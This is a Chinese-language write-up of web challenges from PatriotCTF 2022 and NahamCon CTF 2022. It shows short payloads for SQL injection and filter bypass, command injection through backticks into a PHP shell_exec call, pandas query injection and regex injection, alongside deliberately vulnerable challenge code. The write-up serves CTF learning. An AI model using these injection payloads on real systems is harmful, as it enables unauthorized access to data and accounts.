[PHP知识库]PatriotCTF 2022 + NahamCon CTF 2022 部分wp

PatriotCTF 2022

https://ctftime.org/event/1616/tasks/
被队友取证题带飞了（

web

Rock and Roll

The website is blank! I can’t see anything. Can you help me
find what’s hidden?

Inspector Clouseau

Apocalypse Security - 1

username=1&password=1' or '1'='1

Apocalypse Security - 2

过滤了or，大写绕过即可

username=a&password=1'+Or+'1'%3d'1

Spongebob

给了main.php源码

<?php
$text = $_POST['text'];
$command = "python3.9 memetext.py \"$text\"";
$out = shell_exec($command);
echo $out;
?>

fuzz出来的``可以用

text=`ls`

转为小写然后访问这张图片

PctF{SPoNGebOb_LOokiNG_ThICC}

ps，本来我想管道符构造的，但是不行，自己本地试了一下

有可能是被识别为两个参数然后报错了？

Locked

My website has been completely locked down!!! I don’t care how good of a hacker you are, you won’t be able to hack my website!!!

我隐隐约约有一种感觉，出题人真的很喜欢在跳转和资源加载处做文章……
扫描到有个/admin/index.html，一步步抓包放包

访问pastebin.com/F21q9Eu8，瞅见flag

Excellent Database

I am in the process of making the next big social media platform but I have a history of implementing software insecurely. If you can get into the admin user, I will give you a flag.
I’m testing out this new database architecture, and it’s so beautiful I’ll even let you look at the the code.

给了源码，大概就是用excel当作数据库，dataframe存取数据

def add_user(username, password):
    DB = load_workbook(filename="db.xlsx")
    Users = DB["Users"]
    new_row = Users.max_row + 1
    Users[f"{USERNAMES}{new_row}"] = username
    Users[f"{PASSWORDS}{new_row}"] = password
    DB.save(filename="db.xlsx")

def read_db() -> pd.DataFrame:
    subprocess.Popen(["libreoffice", "--headless", "--convert-to", "csv", "db.xlsx"], stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT).communicate()
    df = pd.read_csv("db.csv")
    return df

看看发现利用点在这段

@app.route("/", methods=["POST", "GET"])
def base():
    if not session.get("username"):
        return redirect(url_for("login"))
    else:
        Users = read_db()
        username = session.get("username")		//登陆后会根据session中的username，把密码取出显示在前端
        password = Users.query(f"Username == '{username}'")["Password"].values[0]
        return render_template('index.html', name=username, password=password)

所以构造用户名

admin' and Username == 'admin
# password = Users.query(f"Username == 'admin' and Username == 'admin'")["Password"].values[0]

/signup注册，得到admin密码SuperStrongPassword
admin用户登陆以后访问/admin得到flag

NahamCon CTF 2022

web

Personnel

给了源码，关键是这句

 results = re.findall(r"[A-Z][a-z]*?" + name + r"[a-z]*?\n", users, setting)

|或拼接正则

setting=0&name=|.*|

本文来自csdn的??shu天??，平时会记录ctf、取证和渗透相关的文章，欢迎大家来我的主页：shu天_CSDN博客-ctf,取证,web领域博主：https://blog.csdn.net/weixin_46081055 看看ヾ(＠ ?ω? ＠)ノ！！

创作打卡挑战赛

赢取流量/现金/CSDN周边激励大奖